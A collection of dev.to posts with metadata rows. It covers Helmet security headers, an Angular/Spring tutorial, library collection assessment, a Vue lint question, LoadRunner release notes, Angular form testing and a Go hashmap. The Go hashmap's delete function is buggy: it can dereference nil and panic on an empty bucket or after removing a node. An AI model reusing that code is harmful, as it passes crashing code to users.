As the name of this header suggests, the browser tries to resolve DNS while (in parallel) loading the page content. DNS resolution for what? - For the links, images, etc referenced on the page which is being loaded. Prefetching occurs in the background. Helps reduce latency. By default, helmet sets this as `off`.
`helmet.dnsPrefetchControl(options)`
- ##`Expect-CT`
CT in this header stands for **Certificate Transparency**. Catch that misissued certificate on that site.
`helmet.expectCt()`
- ##`X-Frame-Options`
A well-known header to prevent clickjacking up to a certain extent. Gets overridden by `frame-ancestors` directive of Content Security Policy header.
`helmet.frameguard();`
- ##`X-Powered-By`
This headers makes very less difference even if turned off. Set to `express` by default in Express framework.
`helmet.hidePoweredBy()`
- ##`Strict-Transport-Security`
or HSTS in short, tells browsers that the website should only be accessible via HTTP(S) protocol. No HTTP please! Takes one mandatory param _max-age_ (which is 180 days in helmet) and 2 optional params _includeSubDomains_ (defaults to true) & _preload_ (defaults to false) in options.
`helmet.hsts(options)`
- ##`X-Download-Options`
Specific to Internet Explorer, this header forces potentially unsafe files and instead downloads them directly, thus preventing script injections since the file is no longer opened in the security context of the site.
`helmet.ieNoOpen()`
- ##`X-Content-Type-Options`
helmet.noSniff sets the X-Content-Type-Options header to nosniff. Browsers in some cases try to guess the MIME types by looking at bytes of resources shared by the server. Hey Browser! Don't do that. That's MIME sniffing. Let me give you a nosniff in the Content Type Options.
`helmet.noSniff()`
- ##`X-Permitted-Cross-Domain-Policies`
Ah! That's a little tricky. Check this [article](https://owasp.org/www-project-secure-headers/#x-permitted-cross-domain-policies) for a detailed description.
`helmet.permittedCrossDomainPolicies(options)`
- ##`Referrer-Policy`
Server dictates what all referrer information it needs in the `Referer` (Oh yeah! That's a misspell) header via `Referrer-Policy` header. It defaults to no-referrer in case of using helmet.
helmet.referrerPolicy(options)
- ##`X-XSS-Protection`
Oh, Stop! I detected an xss attack.
If it's 0 - Disables XSS filtering.
If it's 1 - Enables XSS filtering. sanitize and then load if XSS is detected.
If it's 1; mode=block - Enables XSS filtering. Do not sanitize, just stop the rendering altogether.
`helmet.xssFilter()`
So that was all about the 11 default headers Helmet sets. A snippet from Helmet's [NPM Page](https://www.npmjs.com/package/helmet):

| sid__ |
693,494 | Angular 11 + Spring JPA + PostgreSQL example | Angular 11 Http Client – Spring Boot RestApi Server | https://ozenero.com/angular-11-spring-jpa-postgresql-crud Angular 11 + Spring JPA + PostgreSQL examp... | 0 | 2021-05-10T08:20:00 | https://dev.to/loizenai/angular-11-spring-jpa-postgresql-example-angular-11-http-client-spring-boot-restapi-server-4j8f | angular11, springboot, springjpa, restapi | https://ozenero.com/angular-11-spring-jpa-postgresql-crud
Angular 11 + Spring JPA + PostgreSQL example | Angular 11 Http Client – Spring Boot RestApi Server
In this tutorial, <strong>ozenero</strong> shows you Angular 11 Http Client & Spring Boot Server example that uses <strong>Spring JPA</strong> to interact with <strong>PostgreSQL</strong> and <strong>Angular 11</strong> as a front-end technology to make request and receive response.
Related Posts:
- <a href="https://ozenero.com/spring-framework/spring-boot/use-spring-jpa-postgresql-spring-boot">How to use Spring JPA with PostgreSQL | Spring Boot</a>
- <a href="https://ozenero.com/spring-framework/spring-boot/spring-jpa-postgresql-angularjs-example-spring-boot">Spring JPA + PostgreSQL + AngularJS example | Spring Boot</a>
- <a href="https://ozenero.com/spring-framework/spring-boot/use-angular-http-client-fetch-data-springboot-restapi">How to use Angular Http Client to fetch Data from SpringBoot RestAPI – Angular 11</a>
- <a href="https://ozenero.com/spring-framework/spring-boot/use-angular-httpclient-post-put-delete-data-springboot-rest-apis-angular-4">How to use Angular HttpClient to POST, PUT, DELETE data on SpringBoot Rest APIs – Angular 11</a>
Updated:
- <a href="https://ozenero.com/spring-framework/spring-boot/spring-boot-angular-6-example-spring-data-rest-postgresql-example">Spring Boot + Angular 6 example | Spring Data JPA + REST + PostgreSQL CRUD example</a>
<!--more-->
<h2>I. Technologies</h2>
– Java 1.8
– Maven 3.3.9
– Spring Tool Suite – Version 3.8.4.RELEASE
– Spring Boot: RELEASE
– Angular 11
<h2>II. Overview</h2>
<img src="https://ozenero.com/wp-content/uploads/2017/05/angular-http-service-architecture-1.png" alt="angular-http-service-architecture" width="570" height="542" class="alignnone size-full wp-image-5475" />
<h3>1. Spring Boot Server</h3>
<img src="https://ozenero.com/wp-content/uploads/2017/08/angular-4-spring-jpa-postgresql-spring-boot-architecture.png" alt="angular-4-spring-jpa-postgresql-spring-boot-architecture" width="700" height="330" class="alignnone size-full wp-image-7626" />
For more details about Spring JPA - PostgreSQL, please visit:
<a href="https://ozenero.com/spring-framework/spring-boot/use-spring-jpa-postgresql-spring-boot">How to use Spring JPA with PostgreSQL | Spring Boot</a>
<h3>2. Angular 11 Client</h3>
<img src="https://ozenero.com/wp-content/uploads/2017/08/angular-4-spring-jpa-postgresql-angular-architecture.png" alt="angular-4-spring-jpa-postgresql-angular-architecture" width="698" height="342" class="alignnone size-full wp-image-7628" />
For more details:
- About Angular 11 Routing:
<a href="https://ozenero.com/spring-framework/spring-boot/work-angular-routing-spring-boot-angular-4">How to work with Angular Routing – Spring Boot + Angular 11</a>
- About Angular Http Client to GET/POST/DELETE:
+ <a href="https://ozenero.com/spring-framework/spring-boot/use-angular-http-client-fetch-data-springboot-restapi">How to use Angular Http Client to fetch Data from SpringBoot RestAPI – Angular 11</a>
+ <a href="https://ozenero.com/spring-framework/spring-boot/use-angular-httpclient-post-put-delete-data-springboot-rest-apis-angular-4">How to use Angular HttpClient to POST, PUT, DELETE data on SpringBoot Rest APIs – Angular 11</a>
<h2>III. Practice</h2>
<h3>1. Project Structure</h3>
<h4>1.1 Spring Boot Server</h4>
<img src="https://ozenero.com/wp-content/uploads/2017/08/angular-4-spring-jpa-postgresql-spring-boot-structure.png" alt="angular-4-spring-jpa-postgresql-spring-boot-structure" width="347" height="362" class="alignnone size-full wp-image-7630" />
- Class <strong>Customer</strong> corresponds to entity and table <strong>customer</strong>, it should be implemented <strong>Serializable</strong>.
- <strong>CustomerRepository</strong> is an interface extends <strong>CrudRepository</strong>, will be autowired in <strong>CustomerController</strong> for implementing repository methods and custom finder methods.
- <strong>CustomerController</strong> is a REST Controller which has request mapping methods for RESTful requests such as: <code>getAll</code>, <code>postCustomer</code>, <code>delete</code>, <code>findByLastName</code>.
- Configuration for Spring Datasource and Spring JPA properties in <strong>application.properties</strong>
- <strong>Dependencies</strong> for <strong>Spring Boot</strong> and <strong>PostgreSQL</strong> in <strong>pom.xml</strong>
<h4>1.2 Angular 11 Client</h4>
<img src="https://ozenero.com/wp-content/uploads/2017/08/angular-4-spring-jpa-postgresql-angular-structure.png" alt="angular-4-spring-jpa-postgresql-angular-structure" width="418" height="372" class="alignnone size-full wp-image-7631" />
https://ozenero.com/angular-11-spring-jpa-postgresql-crud
Angular 11 + Spring JPA + PostgreSQL example | Angular 11 Http Client – Spring Boot RestApi Server | loizenai |
693,759 | Collection Analysis and Evaluation | Collection analysis is the process of determining what the exact nature of a collection is. It... | 11,710 | 2021-05-12T08:34:08 | https://dev.to/diyawi/collection-analysis-and-evaluation-2lfl | lis55, learningdiary | Collection analysis is the process of determining what the exact nature of a collection is. It is essential for determining the gaps and weaknesses of the collection, as well as determining what items need to be deselected. It is important as it aids the library and the library's parent organization in making crucial decisions.
Collection assessment is one of the main activities of collection analysis. Assessment involves the library in question analyzing it's own collection, usually with the goal of determining if their collection is fulfilling the mission and vision set by the library and its parent organization. There are two main types of collection assessment, collection based and user-based - both of which have quantitative and qualitative methods.
Collection-based collection assessment involves assessing the collection based on the items contained in the collection. Quantitative collection-based assessment methods include collection size and growth, adherence to collection standards, content overlap studies, ratio measures, and materials budget size and growth. Qualitative collection-based assessment methods include list checking, collection profiling, seeking expert opinions, verification studies, citation analysis, direct collection checking, collection mapping and brief tests of collection strength.
User-based collection assessment - also called use-based collection assessment - focuses on assessing the collection based on how often or well certain items are used. Quantitative methods include interlibrary loan statistics and transactions, circulation and in-house use statistics, document delivery statistics and for e-resources the number of "hits", downloads and their cost per use. Qualitative methods include user-opinion surveys, focus group, user observation and usability testing.
In general determining how successful a library's collection is is very difficult. In theory it is determined by how well the library has chosen its collection to suit its users, but in practice it is difficult to measure how effective a library is at helping its clients. Every library has different clients, all of whom have individual needs. Given that, it is difficult to compare libraries against each other or create a standard for their collections. It is also difficult to ask the library's users to explain how useful the library has been to them, as this too differs from person to person and library to library. To try to accommodate for this difficulty, libraries usually assess their collections using several of the methods discussed.
To demonstrate this, I will
use my former high school library as an example. My former high school was Philippine Science High School Main Campus (PSHS-MC). There are four distinct collections housed in the PSHS-MC library. The first, as with any school library, contains materials that support the school curriculum. These were kept away from the main collection and distributed to the students at the start of each year, with the expectation that the students would return them at the end of the year. This collection is chosen based on the curriculum, and will most likely be assessed based on the expert opinions of the different subject teachers for their respective fields. They should also adhere to international standards of textbooks suitable for high school curriculum. Another issue is the fact that these items are given to different students each academic year to take home, and are subject to wear and tear. As such the collection should also be checked directly with the goal of checking for damaged items.
The second largest collection of the library housed the research works of previous students. As PSHS is a science high school, all students are expected to perform a Science or Technology based research project before graduating, one of the requirements of that project being writing a research paper and having it printed, bound and submitted to the library to be added to the collection. Since this collection contains the legacy of the alumni it should be assessed with the goal of withdrawal in mind rather than deselection. Since this collection is unique it cannot be assessed by any general standard. Instead it should be assessed using in-house use statistics and using citation analysis with the goal of seeing how the present day students utilize the work of their predecessors.
The two smaller collections are kept in service to PSHS's goal of helping the students' holistic development. These are the fiction collection and the Filipiniana collection. These materials should be assessed via list checking, to see if the collections are keeping up with recommended bestsellers, and in-house and circulation statistics to see if the students are actually using the collection items. The former may be difficult for the Filipiniana collection, as there are likely fewer notable lists of Filipiniana items. | diyawi |
693,872 | Which lint ruleset is best for Vue ? | Is it Eslint With vue/recommanded ? Airbnb ? Prettier ? Something else ? What do you guys think ?... | 0 | 2021-05-10T15:33:52 | https://dev.to/mikaleb/which-lint-ruleset-is-best-for-vue-1mne | question, vue, lint | Is it Eslint With vue/recommanded ?
Airbnb ?
Prettier ?
Something else ? What do you guys think ?
| mikaleb |
693,904 | What's new in LoadRunner Professional 2021 R1? | As you know, I publish what's new in Micro Focus LoadRunner from past many years. This time as well,... | 0 | 2021-05-10T16:46:06 | https://qainsights.com/whats-new-in-loadrunner-professional-2021-r1 | performance, testing, webperf, tools | <!-- wp:paragraph -->
<p>As you know, I publish <a href="https://qainsights.com/whats-new-in-microfocus-loadrunner-professional-2021/" target="_blank" rel="noreferrer noopener">what's new in Micro Focus LoadRunner</a> from past many years. This time as well, it is business as usual for LoadRunner What's New section. Last week, Micro Focus announced its first minor release for their performance testing solutions. In this blog, we are going to see what's new in LoadRunner Professional 2021 R1.</p>
<!-- /wp:paragraph -->
<!-- wp:generateblocks/headline {"uniqueId":"9a39f731"} -->
<h2 class="gb-headline gb-headline-9a39f731 gb-headline-text">Say Hello to LoadRunner Professional 2021 R1</h2>
<!-- /wp:generateblocks/headline -->
<!-- wp:paragraph -->
<p>Micro Focus follows <a href="https://calver.org" target="_blank" rel="noreferrer noopener nofollow">CalVer </a>nomenclature for its products. Last year the nomenclature was Service Pack name, but this year it started following Release number. This minor release is called LoadRunner Professional 2021 R1. </p>
<!-- /wp:paragraph -->
<!-- wp:image {"align":"center","id":8331,"sizeSlug":"large","linkDestination":"media"} -->
<div class="wp-block-image"><figure class="aligncenter size-large"><a href="https://qainsights.com/wp-content/uploads/2021/05/image-5.png"><img src="https://qainsights.com/wp-content/uploads/2021/05/image-5.png" alt="What's new in LoadRunner Professional 2021 R1?" class="wp-image-8331"/></a><figcaption>What's new in LoadRunner Professional 2021 R1?</figcaption></figure></div>
<!-- /wp:image -->
<!-- wp:generateblocks/headline {"uniqueId":"cb1a48b7"} -->
<h2 class="gb-headline gb-headline-cb1a48b7 gb-headline-text">What's new in LoadRunner Professional 2021 R1?</h2>
<!-- /wp:generateblocks/headline -->
<!-- wp:generateblocks/headline {"uniqueId":"127affb7","element":"h3"} -->
<h3 class="gb-headline gb-headline-127affb7 gb-headline-text">DevWeb Protocol</h3>
<!-- /wp:generateblocks/headline -->
<!-- wp:paragraph -->
<p>Full code completion is now available in this patch for DevWeb. Auto completion expedites the process of scripting and debugging.</p>
<!-- /wp:paragraph -->
<!-- wp:image {"align":"center","id":8326,"sizeSlug":"large","linkDestination":"media"} -->
<div class="wp-block-image"><figure class="aligncenter size-large"><a href="https://qainsights.com/wp-content/uploads/2021/05/image.png"><img src="https://qainsights.com/wp-content/uploads/2021/05/image.png" alt="Auto Complete in DevWeb" class="wp-image-8326"/></a><figcaption>Auto Complete in DevWeb</figcaption></figure></div>
<!-- /wp:image -->
<!-- wp:paragraph -->
<p>Now you can generate CA certificate to capture the HTTPS traffic. You can make use DevWebUtils.exe and generate the required certificate.</p>
<!-- /wp:paragraph -->
<!-- wp:image {"id":8327,"sizeSlug":"large","linkDestination":"media"} -->
<figure class="wp-block-image size-large"><a href="https://qainsights.com/wp-content/uploads/2021/05/image-1.png"><img src="https://qainsights.com/wp-content/uploads/2021/05/image-1-1024x138.png" alt="DevWeb CA Certificate Generation" class="wp-image-8327"/></a><figcaption>DevWeb CA Certificate Generation</figcaption></figure>
<!-- /wp:image -->
<!-- wp:paragraph -->
<p>In <strong>General Settings</strong> under <strong>Recording Options</strong>, now it is possible to <strong>generate cookies</strong> and <strong>asynchronous WebRequest </strong>steps. Also, you can configure the <strong>Charset </strong>which defaults to utf-8.</p>
<!-- /wp:paragraph -->
<!-- wp:image {"align":"center","id":8328,"sizeSlug":"large","linkDestination":"media"} -->
<div class="wp-block-image"><figure class="aligncenter size-large"><a href="https://qainsights.com/wp-content/uploads/2021/05/image-2.png"><img src="https://qainsights.com/wp-content/uploads/2021/05/image-2.png" alt="DevWeb Settings" class="wp-image-8328"/></a><figcaption>DevWeb Settings</figcaption></figure></div>
<!-- /wp:image -->
<!-- wp:paragraph -->
<p>LoadRunner Developer is now supported on macOS 11 (Big Sur). DevWeb now supports for server-streaming gRPC requests.</p>
<!-- /wp:paragraph -->
<!-- wp:heading {"level":3} -->
<h3 id="h-web-http-htmlprotocol">Web HTTP/HTMLProtocol</h3>
<!-- /wp:heading -->
<!-- wp:paragraph -->
<p>A small change in the Find and Replace user interface.</p>
<!-- /wp:paragraph -->
<!-- wp:image {"align":"center","id":8329,"sizeSlug":"large","linkDestination":"media"} -->
<div class="wp-block-image"><figure class="aligncenter size-large"><a href="https://qainsights.com/wp-content/uploads/2021/05/image-3.png"><img src="https://qainsights.com/wp-content/uploads/2021/05/image-3.png" alt="Quick Find" class="wp-image-8329"/></a><figcaption>Quick Find</figcaption></figure></div>
<!-- /wp:image -->
<!-- wp:paragraph -->
<p>For HTTPS Live Stream, it is now possible to configure the adaptive mode to tell LoadRunner to download only HLS video segments only when they are played.</p>
<!-- /wp:paragraph -->
<!-- wp:code -->
<pre class="wp-block-code"><code>web_stream_open();
...
...
web_stream_close();</code></pre>
<!-- /wp:code -->
<!-- wp:heading {"level":3} -->
<h3 id="h-truclient-protocol">TruClient Protocol</h3>
<!-- /wp:heading -->
<!-- wp:paragraph -->
<p>TruClient and Chromium browser have been updated to 83 and 88 versions respectively. Capture full replay snapshots now available. Also, this release supports Windows 20H2.</p>
<!-- /wp:paragraph -->
<!-- wp:image {"align":"center","id":8330,"sizeSlug":"large","linkDestination":"media"} -->
<div class="wp-block-image"><figure class="aligncenter size-large"><a href="https://qainsights.com/wp-content/uploads/2021/05/image-4.png"><img src="https://qainsights.com/wp-content/uploads/2021/05/image-4.png" alt="TruClient full page snapshot settings" class="wp-image-8330"/></a><figcaption>TruClient full page snapshot settings</figcaption></figure></div>
<!-- /wp:image -->
<!-- wp:generateblocks/headline {"uniqueId":"3f1d28f6","element":"h3"} -->
<h3 class="gb-headline gb-headline-3f1d28f6 gb-headline-text">Java Protocols</h3>
<!-- /wp:generateblocks/headline -->
<!-- wp:paragraph -->
<p>Java scripts can be run on Linux LGs for Java over HTTP, Java Record Replay, and Java Vuser. </p>
<!-- /wp:paragraph -->
<!-- wp:heading {"level":3} -->
<h3 id="h-citrix-and-oracle-2-tier-protocols">Citrix and Oracle 2-tier Protocols</h3>
<!-- /wp:heading -->
<!-- wp:paragraph -->
<p>Citrix protocol now supports Tessaract 4.1.1 and Oracle protocol supports Oracle Database 19c.</p>
<!-- /wp:paragraph -->
<!-- wp:generateblocks/headline {"uniqueId":"21697c77","element":"h3"} -->
<h3 class="gb-headline gb-headline-21697c77 gb-headline-text">Others</h3>
<!-- /wp:generateblocks/headline -->
<!-- wp:list -->
<ul><li>Exceptional integration of VuGen with LoadRunner Enterprise and LoadRunner cloud</li><li>Silk Performer integration</li><li>JMeter 5.4 support </li><li>Pacing runtime support for JMeter and Gatling scripts</li><li>Linux LG support for Selenium scripts</li><li>Visual Studio 2019 IDE support</li><li>You need to have JRE installed, Micro Focus stopped shipping OpenJDK 32 bit in the installation package</li><li>Round-robin allocation of Vusers across LGs</li><li>Runtime collation is now default; this will save the time</li><li>Transactions will be ordered in the order they executed</li></ul>
<!-- /wp:list -->
<!-- wp:paragraph -->
<p>Have you upgraded to LoadRunner Professional 2021 R1 yet? Please let me know in the comments.</p>
<!-- /wp:paragraph --> | qainsights |
694,082 | Angular simple form with async testing | Topic The developer should test the code. In this example, I will create a simple form wit... | 0 | 2021-05-10T18:27:48 | https://dev.to/tomwebwalker/angular-simple-form-with-async-testing-227m | angular, rxjs, testing, typescript | ## Topic
The developer should test the code. In this example, I will create a simple form with an HTTP request after submission and test.
## Project
I used Angular CLI to create the project (default CLI answers):
```
ng new notification-example
```
I used Material Angular to provide propper styling by typing (default answers):
```
ng add @angular/material
```
## Main module
To be able to use required Material modules I added them in imports in `AppModule`:
```typescript
imports: [
BrowserModule,
BrowserAnimationsModule,
ReactiveFormsModule,
HttpClientModule,
MatInputModule,
MatFormFieldModule,
MatButtonModule,
MatSnackBarModule,
],
```
I also added `HttpClientModule` to be able to make HTTP calls. `ReactiveFormsModule` is for making Reactive forms.
Full Module code:
```typescript
import { NgModule } from '@angular/core';
import { BrowserModule } from '@angular/platform-browser';
import { AppComponent } from './app.component';
import { BrowserAnimationsModule } from '@angular/platform-browser/animations';
import { ReactiveFormsModule } from '@angular/forms';
import { MatInputModule } from '@angular/material/input';
import { MatFormFieldModule } from '@angular/material/form-field';
import { MatButtonModule } from '@angular/material/button';
import { MatSnackBarModule } from '@angular/material/snack-bar';
import { HttpClientModule } from '@angular/common/http';
@NgModule({
declarations: [AppComponent],
imports: [
BrowserModule,
BrowserAnimationsModule,
ReactiveFormsModule,
HttpClientModule,
MatInputModule,
MatFormFieldModule,
MatButtonModule,
MatSnackBarModule,
],
providers: [],
bootstrap: [AppComponent],
})
export class AppModule {}
```
## Component
In `AppComponent` I defined simple form with one field which I set as required.
```typescript
form = this.formBuilder.group({
text: [null, Validators.required],
});
```
In the constructor, I used two injected classes:
* `FormBuilder` for making Reactie Form
* `ApiService` for sending data via an HTTP request (Service description is placed lower).
On form submission, I am checking if form is valid and if it is then I am passing field value to the service.
Full component code:
```typescript
import { Component } from '@angular/core';
import { FormBuilder, Validators } from '@angular/forms';
import { ApiService } from './api.service';
@Component({
selector: 'app-root',
templateUrl: './app.component.html',
styleUrls: ['./app.component.scss'],
})
export class AppComponent {
form = this.formBuilder.group({
text: [null, Validators.required],
});
constructor(
private readonly formBuilder: FormBuilder,
private readonly apiService: ApiService
) {}
onSubmit(): void {
if (this.form.invalid) {
return;
}
this.apiService.create(this.form.get('text').value);
}
}
```
HTLM part is really simple, It has form with one field and the submit button.
Full HTML code:
```HTML
<form [formGroup]="form" (submit)="onSubmit()">
<mat-form-field appearance="fill">
<mat-label>Text</mat-label>
<input matInput formControlName="text">
</mat-form-field>
<button mat-raised-button color="primary" [disabled]="form.invalid">Send</button>
</form>
```
To place form in center of the window I added some flexbox styling:
```css
:host {
display: flex;
flex-direction: column;
align-items: center;
justify-content: center;
height: 100%;
}
form {
display: flex;
flex-direction: column;
width: 400px;
}
```
`:host` applies styling to the component root element, so angular will apply styling to the `<app-root>` element.
## Service
At the beginning of the service, I defined two variables:
* `url` - URL address where service will send data
* `subject` - RxJS [class](https://rxjs.dev/api/index/class/Subject) which is used to pass data to HTTP call. We can use the `next` method to pass that data.
Constructor has two injected classes:
* `HttpClient` to be able to make HTTP calls,
* `MatSnackBar` for displaying snack bar from Angular Material.
Subject is used to pass data:
```typescript
this.subject
.pipe(
debounceTime(500),
switchMap((text) => this.http.post(`${this.url}posts`, { text }))
)
.subscribe(
() => this.snackBar.open('Post saved!', null, { duration: 3000 }),
() =>
this.snackBar.open('Something went wrong.', null, { duration: 3000 })
);
```
I am using Subject as an observable by calling the `pipe` method to work on stream:
* `debounceTime` RxJS [operator](https://rxjs.dev/api/operators/debounceTime) will wait with emission in a given time and ignores data emitted in a shorter period.
* `switchMap` RxJS [operator](https://rxjs.dev/api/operators/switchMap) takes data from the outer observable and passes it to the inner observable. Angular Service from default is a singleton, so We don't have to unsubscribe the subject inside the constructor.
If no error occurs during emission snack bar is opened with a `Post saved!` message. If an error occurs, then `Something went wrong` is displayed.
To pass data to subject I am using `next` method:
```typescript
create(text: string): void {
this.subject.next(text);
}
```
Full service code:
```typescript
import { HttpClient } from '@angular/common/http';
import { Injectable } from '@angular/core';
import { MatSnackBar } from '@angular/material/snack-bar';
import { Subject } from 'rxjs';
import { debounceTime, switchMap } from 'rxjs/operators';
@Injectable({
providedIn: 'root',
})
export class ApiService {
private readonly url = 'https://jsonplaceholder.typicode.com/';
private readonly subject = new Subject<string>();
constructor(
private readonly http: HttpClient,
private readonly snackBar: MatSnackBar
) {
this.subject
.pipe(
debounceTime(500),
switchMap((text) => this.http.post(`${this.url}posts`, { text }))
)
.subscribe(
() => this.snackBar.open('Post saved!', null, { duration: 3000 }),
() =>
this.snackBar.open('Something went wrong.', null, { duration: 3000 })
);
}
create(text: string): void {
this.subject.next(text);
}
}
```
## Service tests
To check code coverage of our project, I typed in the command line:
```
ng test --code-coverage
```
It uses a karma reporter to generate test coverage, which I can check in the `coverage` directory. My Service test is missing some checks, so that I will add them.

I generated service with:
```typescript
ng g service api
```
so I have a service file and `*.spec.ts` file, which contains tests.
`describe` block is for wrapping tests in group. `beforeEach` method is triggered before each test. In this method in imports, I have:
```typescript
describe('Service: Api', () => {
let service: ApiService;
let http: HttpClient;
let snackBar: MatSnackBar;
beforeEach(() => {
TestBed.configureTestingModule({
providers: [ApiService],
imports: [HttpClientTestingModule, MatSnackBarModule, NoopAnimationsModule],
});
service = TestBed.inject(ApiService);
http = TestBed.inject(HttpClient);
snackBar = TestBed.inject(MatSnackBar);
});
```
* `HttpClientTestingModule` - for faking HTTP request (I don't want to make real calls)
* `MatSnackBarModule` - component needs it to construct
* `NoopAnimationsModule` - component needs it to construct, faking animations
next, I am taking required instances in tests:
* `service` - my service instance allows me to use service methods
* `http` - HTTP service, for mocking responses
* `snackBar` for listening to method calls
### Test: should send http call
```typescript
it('should send http call', fakeAsync(() => {
const spy = spyOn(http, 'post').and.callThrough();
service.create('test');
service.create('test1');
tick(500);
expect(spy).toHaveBeenCalledOnceWith('https://jsonplaceholder.typicode.com/posts', { text: 'test1' });
}));
```
`it` wraps a single unit test. `fakeAsync` allows me to wait for some time in the test.
```typescript
const spy = spyOn(http, 'post').and.callThrough();
```
I want to check if `post` method will be called. I am passing `http` instance to check that and `.and.callThrough();` to execute code normally like inside service.
```typescript
service.create('test');
service.create('test1');
tick(500);
```
I am passing value to the `create` method like the component is doing. `tick` waits for the time in given milliseconds (reason to wrap test with `fakeAsync`).
```typescript
expect(spy).toHaveBeenCalledOnceWith('https://jsonplaceholder.typicode.com/posts', { text: 'test1' });
}));
```
In the end, I am checking if my `spy` (`post` method from `HTTP` service instance) is called only once with the same values as in service.
### Test: should call open on snack bar positive
```typescript
it('should call open on snack bar positive', fakeAsync(() => {
spyOn(http, 'post').and.returnValue(of(true));
const openSpy = spyOn(snackBar, 'open');
service.create('test');
tick(500);
expect(openSpy).toHaveBeenCalledOnceWith('Post saved!', null, { duration: 3000 });
}));
```
Main difference from first test is:
```typescript
spyOn(http, 'post').and.returnValue(of(true));
```
I used `.and.returnValue(of(true));` to fake response from HTTP service and I am returning new observable by using `of` operator with value `true`. The rest of the test is similar to the first one. In the end, I am checking if a "positive" snack bar was called.
### Test: should call open on snack bar negative
```typescript
it('should call open on snack bar negative', fakeAsync(() => {
spyOn(http, 'post').and.returnValue(throwError('err'));
const openSpy = spyOn(snackBar, 'open');
service.create('test');
tick(500);
expect(openSpy).toHaveBeenCalledOnceWith('Something went wrong.', null, { duration: 3000 });
}));
```
Like the second one, but I am checking if the "negative" snack bar was called.
Now, after checking code coverage, I have 100% code covered in my service, and all tests passed:

[Link](https://github.com/TomWebwalker/notification-example) to repo.
| tomwebwalker |
697,171 | HashMap in Go | This is a implementation of closed addressing in a typical hashmap we use in go lang. some globals &... | 0 | 2021-05-13T12:11:06 | https://dev.to/satishrajnale/hashmap-in-go-3oid | go | This is a implementation of closed addressing in a typical hashmap we use in go lang.
**some globals & imports**
```go
package main
import "fmt"
const ArraySize = 7
```
### Now lets define our steps
## Structures
> Hashtable structure
```go
type HashTable struct{
// our hashtable will be an array
array [ArraySize]* bucket
}
```
> bucket structure (linkedlist)
```go
type bucket struct{
head * bucketNode
}
```
> bucketNode structure
```go
type bucketNode struct{
key string
next *bucketNode
}
```
## Hash function
```go
func hash(key string) int{
sum := 0
for _,v := range key{
sum += int(v)
}
return sum % ArraySize
}
```
## Methods for HashTable
- insert method
```go
//insert will take a key and add it to hash table arr
func (h *HashTable) Insert(key string) {
index := hash(key)
h.array[index].insertInBucket(key)
}
```
- search method
```go
//search will take a key and return true if in hash table arr
func (h *HashTable) Search(key string) bool{
index := hash(key)
return h.array[index].searchInBucket(key)
}
```
- delete method
```go
//delete will take a key and delete the item from hash table arr
func (h *HashTable) Delete(key string) {
index := hash(key)
h.array[index].deleteFromBucket(key)
}
```
## Methods for Bucket(linkedlist)
- insertInBucket function
```go
func (b * bucket) insertInBucket(k string) {
if !b.searchInBucket(k){
newNode := &bucketNode{key : k}
newNode.next = b.head
b.head = newNode
} else {
fmt.Println(k, "Already exists")
}
}
```
- searchInBucket function
```go
func (b * bucket) searchInBucket(k string) bool {
currentNode := b.head
for currentNode != nil {
if currentNode.key == k {
return true
}
currentNode = currentNode.next
}
return false
}
```
- deleteFromBucket function
```go
func (b*bucket) deleteFromBucket(k string){
if(b.head.key == k){
b.head = b.head.next
return
}
previousNode := b.head
for previousNode.next != nil{
if previousNode.next.key == k {
previousNode.next = previousNode.next.next
}
previousNode = previousNode.next
}
}
```
## Init function
```go
// Init function to initialize hashtable this will create a bucket in
// each slot of the hashtable
func Init() *HashTable{
result := &HashTable{}
for i := range result.array {
result.array[i] = &bucket{}
}
return result
}
```
## Main function
```go
func main() {
// myHashTable := &HashTable{} checking step
myHashTable := Init()
// fmt.Println(myHashTable)
// testBucket := &bucket{}
// testBucket.insertInBucket("sangha")
// fmt.Println(testBucket.searchInBucket("sangha"))
// testBucket.deleteFromBucket("messi")
// fmt.Println(testBucket.searchInBucket("sangha"))
list := []string{
"ERIC",
"JASH",
"JOSEPH",
"PRAVIN",
"WASER",
"MAYUR",
"QINGSHIN",
}
for _,v := range list{
myHashTable.Insert(v)
}
fmt.Println(myHashTable.Search("JOSEPH"))//true
fmt.Println(myHashTable.Search("MEGAN"))//false
}
```
### Lastly Full Code
run command: go build main.go
> //main.go is your filename
```go
package main
import "fmt"
const ArraySize = 7
// hash function
func hash(key string) int{
sum := 0
for _,v := range key{
sum += int(v)
}
return sum % ArraySize
}
// Hashtable structure
type HashTable struct{ // our hashtable will be an array
array [ArraySize]* bucket
}
// bucket structure (linkedlist)
type bucket struct{
head * bucketNode
}
//bucketNode structure
type bucketNode struct{
key string
next *bucketNode
}
//insert will take a key and add it to hash table arr
func (h *HashTable) Insert(key string) {
index := hash(key)
h.array[index].insertInBucket(key)
}
//insertInBucket function
func (b * bucket) insertInBucket(k string) {
if !b.searchInBucket(k){
newNode := &bucketNode{key : k}
newNode.next = b.head
b.head = newNode
} else {
fmt.Println(k, "Already exists")
}
}
//search will take a key and return true if in hash table arr
func (h *HashTable) Search(key string) bool{
index := hash(key)
return h.array[index].searchInBucket(key)
}
// searchInBucket function
func (b * bucket) searchInBucket(k string) bool {
currentNode := b.head
for currentNode != nil {
if currentNode.key == k {
return true
}
currentNode = currentNode.next
}
return false
}
//delete will take a key and delete the item from hash table arr
func (h *HashTable) Delete(key string) {
index := hash(key)
h.array[index].deleteFromBucket(key)
}
// deleteFromBucket function
func (b*bucket) deleteFromBucket(k string){
if(b.head.key == k){
b.head = b.head.next
return
}
previousNode := b.head
for previousNode.next != nil{
if previousNode.next.key == k {
previousNode.next = previousNode.next.next
}
previousNode = previousNode.next
}
}
// Init function to initialize hashtable this will create a bucket in
// each slot of the hashtable
func Init() *HashTable{
result := &HashTable{}
for i := range result.array {
result.array[i] = &bucket{}
}
return result
}
func main() {
// myHashTable := &HashTable{} checking step
myHashTable := Init()
fmt.Println(myHashTable)
testBucket := &bucket{}
testBucket.insertInBucket("sangha")
fmt.Println(testBucket.searchInBucket("sangha"))
testBucket.deleteFromBucket("sangha")
fmt.Println(testBucket.searchInBucket("sangha"))
list := []string{
"ERIC",
"JASH",
"JOSEPH",
"PRAVIN",
"WASER",
"MAYUR",
"QINGSHIN",
}
for _,v := range list{
myHashTable.Insert(v)
}
fmt.Println(myHashTable.Search("JOSEPH"))//true
fmt.Println(myHashTable.Search("MEGAN"))//false
}
``` | satishrajnale |
